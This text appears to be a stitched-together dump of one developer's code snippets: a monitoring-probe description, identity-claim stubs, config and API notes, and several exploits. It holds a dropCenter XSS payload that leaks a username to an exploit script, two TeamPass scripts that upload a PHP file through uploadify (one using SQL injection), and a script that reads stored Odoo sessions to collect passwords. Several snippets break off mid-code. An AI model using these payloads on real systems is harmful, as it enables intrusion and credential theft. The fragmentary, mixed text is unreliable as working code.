Cette sonde permet de vérifier des sites web :
- vérification du HTTP Status Code (2xx)
- vérification de la présence d'un terme dans la page
- vérification du temps de chargement
Verifying that +leblanc_simon is my blockchain ID. https://onename.com/leblanc_simon |
<?php | |
# Exploit Title: dropCenter all version : privilege escalation | |
# If this is the last version (after 2013-08-20), use permanent XSS to hack the website : | |
# | |
# - Encoded URL : http://localhost/dropCenter/index.php?error=%22%29%3B%24%28document%29.ready%28function%28%29%7B%24%28%27body%27%29.append%28%27%3Cimg+src%3D%22http%3A%2F%2Flocalhost%2Fdropcenter_exploit.php%3Fuser%3D%27%2B%24%28%27form%5Baction%5E%3D%22php%2Faction.php%3Faction%3DsaveSettings%22%5D%27%29.attr%28%27action%27%29.match%28%2Fuser%3D%28.%2A%29%2F%29%5B1%5D%2B%27%22%2F%3E%27%29%7D%29%3Bfunction+test%28%29%7B%7Dtest%28%22 | |
# | |
# - Decoded URL : http://localhost/dropCenter/index.php?error=");$(document).ready(function(){$('body').append('<img src="http://localhost/dropcenter_exploit.php?user='+$('form[action^="php/action.php?action=saveSettings"]').attr('action').match(/user=(.*)/)[1]+'"/>')});function test(){}test(" | |
# | |
# Date: 2013-08-02 | |
# Author: leviathan |
<?php | |
/* | |
Usage of API : | |
- Search / Get links : | |
* method: GET | |
* URL : ?do=api (add &token=[hash_hmac(sha256, api_key, api_hash)] to add private link in search) | |
* return: JSON (object or array) | |
* &key=[linkdate]: |
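#!/usr/bin/python
# Walk the sessions that an Odoo server has written to disk under the current
# user's home directory. Only the beginning of the script is visible in this
# listing: the loop body ends after the session is loaded.
#
# Layout repair: the table residue (" | |") that trailed every line and the
# lost indentation of the loop body made the listing unparseable; both are
# restored here without changing any statement.
import os

# NOTE: werkzeug.contrib was deprecated in Werkzeug 0.15 and removed in 1.0,
# so this import only resolves against older Werkzeug releases.
from werkzeug.contrib.sessions import FilesystemSessionStore

# Per-user Odoo data directory. Whatever the server keeps in a session is
# readable by any account with read access here, so the directory should be
# owner-only (mode 0700) on a shared host.
session_store = FilesystemSessionStore(os.path.expanduser('~/.local/share/Odoo/sessions'))

# Accumulator used by the part of the script that is not shown; the name
# suggests it collects password values found in the stored sessions
# (NOTE(review): inferred from the name only, confirm against the full file).
passwds = []

for sid in session_store.list():
    # SECURITY: FilesystemSessionStore.get() deserializes the session file
    # with pickle. Point it only at a session directory you trust, because a
    # planted file in that directory runs code in this process when loaded.
    session = session_store.get(sid)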
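# Reproduction script for an authentication round-trip issue in prestapyt:
# it issues six webservice calls in a fixed order, and the trailing comments
# record the HTTP status codes the author observed for each one.
#
# Layout repair: the table residue (" | |") that trailed the import and the
# constructor line made them syntax errors; it is removed, statements are
# otherwise unchanged and stay in their original order.
from prestapyt import PrestaShopWebServiceError, PrestaShopWebService, PrestaShopWebServiceDict

# Sample key against a localhost shop (the value is the MD5 of "test", i.e. a
# throwaway). A real webservice key grants API access to the shop: load it
# from configuration or the environment rather than committing it, and use
# https:// so the key is not sent in clear text.
prestashop = PrestaShopWebServiceDict('http://localhost/api', '098F6BCD4621D373CADE4E832627B4F6')

# "401 + 200" means the request was first rejected without credentials and
# then succeeded on the authenticated retry; "200 only" means the credentials
# were sent up front. The author expects the challenge on the first call only.
prestashop.search('addresses')  # 401 + 200 : OK, it's the first call
prestashop.get('addresses', 4)  # 200 only: OK
prestashop.get('addresses', 6)  # 200 only: OK
# Switching to a different resource triggers the challenge again, which is the
# behaviour being reported (presumably credentials are remembered per resource
# path rather than for the whole API root; confirm in the HTTP client).
prestashop.search('orders')  # 401 + 200 : NOK, it must be only 200
prestashop.get('orders', 2)  # 200 only: OK
prestashop.get('orders', 5)  # 200 only: OK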
<?php | |
$url = 'http://localhost/teampass/'; | |
$curl = curl_init(); | |
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php?key_tempo=lol&user_id='.urlencode('0 UNION SELECT \'lol\'')); | |
curl_setopt($curl, CURLOPT_POST, true); | |
$post = array( | |
'Filedata' => '@info.php', | |
'type_upload' => 'import_items_from_csv', | |
'folder' => '/teampass/files', |
<?php | |
$url = 'http://localhost/nilsteampassnet-TeamPass-65f3167/'; | |
$curl = curl_init(); | |
curl_setopt($curl, CURLOPT_URL, $url.'includes/libraries/uploadify/uploadify.php'); | |
curl_setopt($curl, CURLOPT_POST, true); | |
$post = array( | |
'Filedata' => '@info.php', | |
'type_upload' => 'import_items_from_csv', | |
'folder' => '/nilsteampassnet-TeamPass-65f3167/files', |
# Project name | |
propel.project = OpenSondage | |
# Database driver | |
propel.database = mysql | |
propel.mysql.tableType = MyISAM | |
propel.mysql.tableEngineKeyword = ENGINE | |
propel.tablePrefix = | |
################################################# |
I hereby claim:
To claim this, I am signing this object: